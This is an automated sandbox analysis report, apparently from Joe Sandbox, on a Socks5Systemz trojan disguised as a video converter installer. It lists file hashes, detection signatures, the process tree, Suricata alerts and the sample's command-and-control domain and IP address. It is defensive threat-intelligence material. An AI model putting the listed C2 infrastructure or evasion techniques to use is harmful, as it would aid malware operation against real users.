
Windows Analysis Report
N6jsQ3XNNX.exe

Overview

General Information

Sample name: N6jsQ3XNNX.exe (renamed because the original name is a hash value)
Original sample name: 46d2e28be5ad34097672b73bfa78e805.exe
Analysis ID: 1528604
MD5: 46d2e28be5ad34097672b73bfa78e805
SHA1: 46450994830546f63d2079fddb1cd79b71584a3b
SHA256: 433c601579555db1aa2f00a2188b73306c5b8907ea17ec3f901baf35796e7a31
Tags: 32, exe, Socks5Systemz, trojan

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • N6jsQ3XNNX.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\N6jsQ3XNNX.exe" MD5: 46D2E28BE5AD34097672B73BFA78E805)
    • N6jsQ3XNNX.tmp (PID: 2324 cmdline: "C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp" /SL5="$203BE,4230882,54272,C:\Users\user\Desktop\N6jsQ3XNNX.exe" MD5: 16C9D19AB32C18671706CEFEE19B6949)
      • jennyvideoconverter32_64.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe" -i MD5: 65FDD2B7C5D23EEF202604FCFEFD2FF4)
  • svchost.exe (PID: 5276 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Malware configuration: {"C2 list": ["diuzout.info"]}

Source | Rule | Description | Author | Strings
00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: jennyvideoconverter32_64.exe PID: 2760 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |

System Summary

Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5276, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T04:13:52.485360+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63161 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:55.430626+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63161 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:56.276515+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63163 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:57.075057+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63165 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:57.430314+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63165 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:58.256550+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63166 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:59.060654+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63167 | 185.208.158.248 | 80 | TCP
2024-10-08T04:13:59.411684+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63167 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:00.235449+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63168 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:00.578394+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63168 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:01.398277+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63169 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:02.218620+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:02.562916+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:02.906768+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:03.256863+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63170 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:04.056622+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63171 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:04.879972+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63172 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:05.706045+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63174 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:06.546534+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63175 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:07.381969+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63176 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:08.204252+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63177 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:09.014942+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63178 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:09.364554+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63178 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:10.181754+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63179 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:10.981526+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63180 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:11.334754+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63180 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:12.145048+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63181 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:13.116895+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63182 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:13.930977+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63183 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:14.737108+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63184 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:15.553262+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63185 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:16.375905+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63186 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:17.180272+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63187 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:18.027086+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63188 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:18.857959+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63189 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:19.213242+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63189 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:20.022955+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63190 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:20.839054+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63191 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:21.653769+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63192 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:22.003080+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63192 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:22.835901+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63193 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:23.663046+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63194 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:24.482027+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63197 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:24.831303+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63197 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:25.643422+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63198 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:26.470695+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63199 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:27.282637+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63200 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:28.102266+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63201 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:29.224418+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63202 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:30.061625+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63203 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:30.418069+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63203 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:31.234585+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63204 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:31.579465+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63204 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:32.416312+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63205 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:33.254525+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63206 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:34.223810+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63207 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:35.057170+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63208 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:35.885964+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63209 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:36.696717+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63210 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:37.500804+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63211 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:37.843985+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63211 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:38.666724+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63213 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:39.488680+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63214 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:40.324704+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63215 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:40.675579+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63215 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:41.513567+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63216 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:41.861032+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63216 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:42.705424+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63217 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:43.540491+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63218 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:44.378094+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63219 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:45.232632+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63220 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:45.583772+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63220 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:46.404938+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63221 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:46.750961+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63221 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:47.566653+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63222 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:48.435341+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63223 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:48.785107+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63223 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:49.610149+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63224 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:49.956149+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63224 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:50.773595+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63225 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:51.590209+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63226 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:51.936933+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63226 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:52.757844+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63227 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:53.600074+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63228 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:54.413726+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63229 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:55.227231+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63230 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:56.066016+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63231 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:56.908568+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63232 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:57.773482+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63233 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:58.597301+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63234 | 185.208.158.248 | 80 | TCP
2024-10-08T04:14:59.420311+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63235 | 185.208.158.248 | 80 | TCP
2024-10-08T04:15:00.249206+0200 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.6 | 63236 | 185.208.158.248 | 80 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Avira: detection malicious, Label: HEUR/AGEN.1329998
Source: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe | Avira: detection malicious, Label: HEUR/AGEN.1329998
Source: jennyvideoconverter32_64.exe.2760.3.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["diuzout.info"]}
Source: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe | Virustotal: Detection: 36%
Source: N6jsQ3XNNX.exe | Virustotal: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,2_2_0045D4EC
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0045D5A0 ArcFourCrypt,2_2_0045D5A0
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_0045D5B8 ArcFourCrypt,2_2_0045D5B8
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_10001000 ISCryptGetVersion,2_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_10001130 ArcFourCrypt,2_2_10001130

Compliance

Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe | Unpacked PE file: 3.2.jennyvideoconverter32_64.exe.400000.0.unpack
Source: N6jsQ3XNNX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Jenny Video Converter_is1
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00452A4C FindFirstFileA,GetLastError,2_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,2_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,2_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp | Code function: 2_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00497A74

Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63170 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63168 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63201 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63165 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63166 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63181 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63175 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63199 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63161 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63184 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63176 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63189 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63219 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63177 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63217 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63183 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63197 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63171 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63204 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63236 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63169 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63207 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63223 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63163 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63192 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63218 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63200 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63205 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63230 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63193 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63206 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63225 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63174 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63234 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63187 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63210 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63167 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63232 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63228 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63178 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63180 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63231 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63179 -> 185.208.158.248:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:63202 -> 185.208.158.248:80
